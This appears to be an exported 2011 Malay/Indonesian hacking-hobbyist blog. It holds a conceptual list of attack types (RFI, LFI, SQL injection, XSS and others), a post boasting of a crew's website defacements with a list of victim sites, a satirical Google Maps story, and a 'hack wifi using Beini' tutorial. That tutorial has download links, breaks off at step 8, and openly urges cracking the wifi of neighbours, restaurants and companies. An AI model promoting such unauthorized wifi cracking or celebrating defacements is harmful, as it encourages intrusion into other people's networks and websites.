</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">6. E-mail Exploits</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">7. DNS and BIND Vulnerabilities</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">8. Password Attacks</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">9.Proxy Server Attacks</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">10. Remote Command Processing Attacks</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">11. Remote File System Attack</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">12. Selective Program Insertions</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">13. Port Scanning</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">14.TCP/IP Sequence Stealing, Passive Port Listening and Packet</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">15. HTTPD Attacks</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">16. Remote File Inclusion (RFI)</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan RFI seorang attacker dapat menginclude kan file yang berada di luar server yang bersangkutan.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">17. Local File Inclusion (LFI)</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan LFI seorang attacker dapat menginclude kan file yang berada di dalam server yang bersangkutan.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">18. SQL injection</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">SQL injection adalah teknik yang memanfaatkan kesalahan penulisan query SQL pada suatu website sehingga seorang hacker bisa menginsert beberapa SQL statement ke ‘query’ dengan cara memanipulasi data input ke aplikasi tersebut. sql injection merupakan teknik lawas namun paling banyak digunakan oleh para dedemit maya.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">19. Cross Site Scripting (XSS)</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">XSS dikenal juga dengan CSS adalah singkatan dari Cross Site Scripting. XSS adalah suatu metode memasukan code atau script HTML kedalam suatu website yang dijalankan melalui browser di client.</div><div style="line-height: 16px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-51549538829617226182011-10-30T23:45:00.000+08:002011-10-30T23:45:50.721+08:00HACKED BY ANTUWEBHUNT3R<div style="text-align: center;">salam :D Adios ada story baru..</div><div style="text-align: center;">kenal ANTUWEBHUNT3R x?</div><div style="text-align: center;">nk taw dy da wat pe ?</div><div style="text-align: center;">try tgk link kat bwah nie</div><div style="text-align: center;"><span class="Apple-style-span" style="background-color: white; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; line-height: 14px;"><a href="http://998dock.com/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: underline;" target="_blank">http://998dock.com/myhex.html</a><br />
<a href="http://boathoistwarehouse.com/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://boathoistwarehouse.com/</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>myhex.html</a><br />
<a href="http://greatlakesentry.com/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://greatlakesentry.com/myh</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>ex.html</a><br />
<a href="http://boathoistwarehouse.com/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://boathoistwarehouse.com/</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>myhex.html</a><br />
<a href="http://stonekeepproducts.com/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://stonekeepproducts.com/m</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>yhex.html</a><br />
<a href="http://www.javadevel.com/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.javadevel.com/</a><br />
<a href="http://dev.boxadmin.com/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://dev.boxadmin.com/</a><br />
<a href="http://leslie.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://leslie.lelezard.fr/</a><br />
<a href="http://www.astrosrp.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.astrosrp.fr/</a><br />
<a href="http://www.rcworld.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.rcworld.fr/</a><br />
<a href="http://www.lilyrock.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://www.lilyrock.fr/</a><br />
<a href="http://www.lelezard.fr/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://www.lelezard.fr/myhex.h</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>tml</a><br />
<a href="http://zouzou.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://zouzou.lelezard.fr/</a><br />
<a href="http://ratounesque.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://ratounesque.lelezard.fr</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>/</a><br />
<a href="http://photos.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://photos.lelezard.fr/</a><br />
<a href="http://bob.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://bob.lelezard.fr/</a><br />
<a href="http://blldl.lelezard.fr/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://blldl.lelezard.fr/</a><br />
<a href="http://appwizard.be/myhex.html">http://appwizard.be/myhex.html</a><br />
<a href="http://ballepeloteshop.be/index.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://ballepeloteshop.be/inde</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>x.html</a><br />
<a href="http://trippper.com/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://trippper.com/</a><br />
<a href="http://citytripping.be/index.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://citytripping.be/index.h</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>tml</a><br />
<a href="http://deoudegarde.be/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://deoudegarde.be/myhex.ht</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>ml</a><br />
<a href="http://growsomebeans.com/index.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank"><span>http://growsomebeans.com/index</span><wbr></wbr><span class="word_break" style="display: inline-block;"></span>.html</a><br />
<a href="http://kaatsshop.be/myhex.html" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://kaatsshop.be/myhex.html</a><br />
<a href="http://ollobollo.com/" rel="nofollow nofollow" style="color: #3b5998; cursor: pointer; text-decoration: none;" target="_blank">http://ollobollo.com/</a></span></div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">ok nie printscreen web yg dy da deface k</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy4H0q2tV1pDiAHonoxE2njhDIst4G1_N4V1Hium8S5AZ8lV6itiwhwxcP8qbfyGa5AQv-_PQCPMe6xFT-bMgTs5GktFSz3wlyIzEy6ZOKNMbiEV10M0_C0n7Z_-7-ElnGWgs2jS9vaff/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSy4H0q2tV1pDiAHonoxE2njhDIst4G1_N4V1Hium8S5AZ8lV6itiwhwxcP8qbfyGa5AQv-_PQCPMe6xFT-bMgTs5GktFSz3wlyIzEy6ZOKNMbiEV10M0_C0n7Z_-7-ElnGWgs2jS9vaff/s400/Untitled.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><div class="separator" style="clear: both; text-align: center;">credit to <span class="Apple-style-span" style="background-color: white; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; font-weight: bold; line-height: 14px;"><a href="http://www.facebook.com/myHexCrew">WebHunter MyHex</a></span></div><div style="text-align: center;"><br />
</div><div class="fullpost"><br />
</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0Dungun, Terengganu, Malaysia4.756459 103.399683099999954.647101 103.27208909999995 4.8658170000000007 103.52727709999995tag:blogger.com,1999:blog-5159176994329752150.post-79595190841482415202011-10-30T20:37:00.003+08:002011-10-30T22:37:21.634+08:00<span class="Apple-style-span" style="background-color: #141414; font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; font-size: 13px; line-height: 18px;"></span><br />
<h3 class="post-title entry-title" style="color: black; font: bold 22px Arial,Tahoma,Helvetica,FreeSans,sans-serif; margin: 0px; position: relative; text-align: center;"><a href="http://faceberuk.blogspot.com/2011/08/seorang-warga-emas-di-china-menyaman.html" style="font: normal normal bold 22px/normal Arial, Tahoma, Helvetica, FreeSans, sans-serif; text-decoration: underline;"><span class="Apple-style-span">Seorang Warga Emas di China menyaman Google Maps 80juta Yuan.</span></a></h3><div class="post-header" style="line-height: 1.6; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="post-header-line-1"></div></div><div class="post-body entry-content" id="post-body-3786456131966341623" style="line-height: 1.4; position: relative; width: 536px;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsN1NRRYBvW6tcgsmDsDL8GBy2hQGxAJ7zZpMUCYd1ZtdBz8QsyTBGlELdMqOpqNHJ7IB-HsT1vWMTVUTdfH4OGSo9ZwXifhGY9Lf0jVCxEamqbl9FDFxMXGSkXAqaRy8M6Y_bQ-4aZLt/s1600/nanping+-+Google+Maps.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span" style="color: yellow;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCsN1NRRYBvW6tcgsmDsDL8GBy2hQGxAJ7zZpMUCYd1ZtdBz8QsyTBGlELdMqOpqNHJ7IB-HsT1vWMTVUTdfH4OGSo9ZwXifhGY9Lf0jVCxEamqbl9FDFxMXGSkXAqaRy8M6Y_bQ-4aZLt/s320/nanping+-+Google+Maps.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: transparent; border-bottom-left-radius: 0px 0px; border-bottom-right-radius: 0px 0px; border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: transparent; border-left-style: solid; border-left-width: 0px; border-right-color: transparent; border-right-style: solid; border-right-width: 0px; border-top-color: transparent; border-top-left-radius: 0px 0px; border-top-right-radius: 0px 0px; border-top-style: solid; border-top-width: 0px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; position: relative;" width="320" /></span></a></div><div style="color: black; text-align: justify;"><span class="Apple-style-span">China, 16 August - Seorang warga emas, Ang Xing, 83, di provinsi Nanping, China, bercadang untuk menyaman syarikat enjin carian terbesar dunia Google atas perbuatan syarikat itu secara sengaja menyuruhnya melakukan satu perbuatan membunuh diri, semalam.</span><br />
<span class="Apple-style-span"> </span><br />
<span class="Apple-style-span"> Beliau yang dijumpai para wartawan semalam kelihatan sangat dukacita dan <i>butthurt</i>akibat salah informasi yang diberikan oleh Google Maps.</span><br />
<span class="Apple-style-span"> </span><br />
<span class="Apple-style-span"> Menurutnya, tidak sepatutnya enjin peta satelit terbaik di dunia itu menyuruhnya melakukan sesuatu yang di luar kemampuan orang tua. Dia yang berjaya <i>print screen</i> imej Google Maps yang akan dijadikan bukti, berkata dengan penuh emosi,</span><br />
<span class="Apple-style-span"> </span><br />
<span class="Apple-style-span"> "Pak cik tak tahu jalan. Perjalanan pakcik ini sangat jauh lalu atas saranan seorang saudara pakcik, pakcik pun guna Google Maps untuk berikan instruction. Tapi pakcik rasa bagai tak percaya apabila Google Maps suruh pakcik berenang melintasi lautan Pasific untuk ke tempat tersebut, yang berada di Taiwan. Pakcik rasa diperdaya."</span><br />
<span class="Apple-style-span"> </span><br />
<span class="Apple-style-span"> Lalu beliau menunjukkan bukti paparan instruction 'maut' oleh Google Maps yang telah dirakam.</span><br />
<span class="Apple-style-span"> </span></div><div class="separator" style="clear: both; color: black; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSMnSaWdaeb5hXPlSCeADdcwiGbaB6-lpwoaPpRd6wV40cwcubjmdr3qRBM8CFune0mHwFm42xtYkIm2IzcAHujbXnlIgsj4Yj-rUINFocYsQ5OCCbGjArt9-zNOs66iCQd3pNTeSANSR5/s1600/chinatotaiwan.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span class="Apple-style-span"><img alt="google maps kelakar" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSMnSaWdaeb5hXPlSCeADdcwiGbaB6-lpwoaPpRd6wV40cwcubjmdr3qRBM8CFune0mHwFm42xtYkIm2IzcAHujbXnlIgsj4Yj-rUINFocYsQ5OCCbGjArt9-zNOs66iCQd3pNTeSANSR5/s1600/chinatotaiwan.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: transparent; border-bottom-left-radius: 0px 0px; border-bottom-right-radius: 0px 0px; border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: transparent; border-left-style: solid; border-left-width: 0px; border-right-color: transparent; border-right-style: solid; border-right-width: 0px; border-top-color: transparent; border-top-left-radius: 0px 0px; border-top-right-radius: 0px 0px; border-top-style: solid; border-top-width: 0px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.199219) 0px 0px 0px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; position: relative;" width="500" /></span></a></div><div style="color: black;"><span class="Apple-style-span"><br />
</span><br />
<div style="text-align: justify;"><span class="Apple-style-span"> Dengan menunduk dan sedih mengelap air mata, pakcik itu berkata, "Cilaka Google ingat pakcik ini penyu barangkali. Pakcik akan saman Google Maps, Google Translate, Google News, <a href="http://faceberuk.blogspot.com/2011/08/14-produk-terbaru-google-selepas-google.html" style="text-decoration: none;">Google Sun</a> dan semua anak beranak google. Saman semuanya." </span></div></div></div><div class="post-body entry-content" id="post-body-3786456131966341623" style="color: black; line-height: 1.4; position: relative; width: 536px;"><span class="Apple-style-span"><br />
</span></div><div class="post-body entry-content" id="post-body-3786456131966341623" style="color: black; line-height: 1.4; position: relative; width: 536px;"><span class="Apple-style-span">kredit to:<a href="http://faceberuk.blogspot.com/search/label/Troll%20Troll%20Troll">faceberuk</a></span></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-28450792553981244032011-10-30T17:48:00.001+08:002011-10-30T23:10:36.633+08:00Tutorial hack wifi using Beini :D<div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">1. Mula2 tgok korang punya network adapter wireless (untuk laptop) @ brand/chipset external usb wireless smada bleh suport or tak..klu x bleh sabo jak la ekk..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;"><a href="http://www.mediafire.com/?cpna5u77domrwac" rel="nofollow" style="cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.mediafire.com/?cpna5u77domrwac</a></span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">2. Download Beini ni kat link yg dah aku sedia kn tuk korg..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;"><a href="http://www.mediafire.com/?fi8ipa6i12fih19" rel="nofollow" style="cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.mediafire.com/?fi8ipa6i12fih19</a></span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">3. Lepas download Beini tu, pastikn ekk dlm format iso..klu format rar korang kena extract dlu ok..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">4. Cara nak run Beini tu korang msti burn iso tu as image kat cd (pakai nero, ashampoo, ultraiso n lain2) untuk boot menggunakan cd la..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">5. Klu nak boot gna usb(pendrive), korang guna software kat link yg aku bg ni..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;"><a href="http://www.mediafire.com/?coa1mn3cdjabak2" rel="nofollow" style="cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.mediafire.com/?coa1mn3cdjabak2</a></span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">dan ni link tutorial cara nak boot Beini kat dlm pendrive</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;"><a href="http://www.mediafire.com/?7354r7yhiz4argj" rel="nofollow" style="cursor: pointer; line-height: 16px; text-decoration: none;" target="_blank">http://www.mediafire.com/?7354r7yhiz4argj</a></span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">AKU SARANKAN KORANG PRINT OUT STEP NI LPAS KORANG BACA SBB NAK GUNA BILA NAK HACK TPI KLU OTAK KORANG JENIS MUDAH INGAT ABAIKAN OK..;)</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">6. Ok lpas dah download smua ni n dah burn dlm cd or usb kita truskn ngan projek kta hack wifi kwn,jiran,restoran2 berdekatan,syarikat2 n yg lain2 ok...</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">7. -Mula2 msukkan cd boot td or usb(pendrive yg dah boot pakai UNETbootin 377) ke laptop anda n restart kan laptop korng..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">8. -Bila dah runing software tu, korang enter jak kat tulisan DEFAULT..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
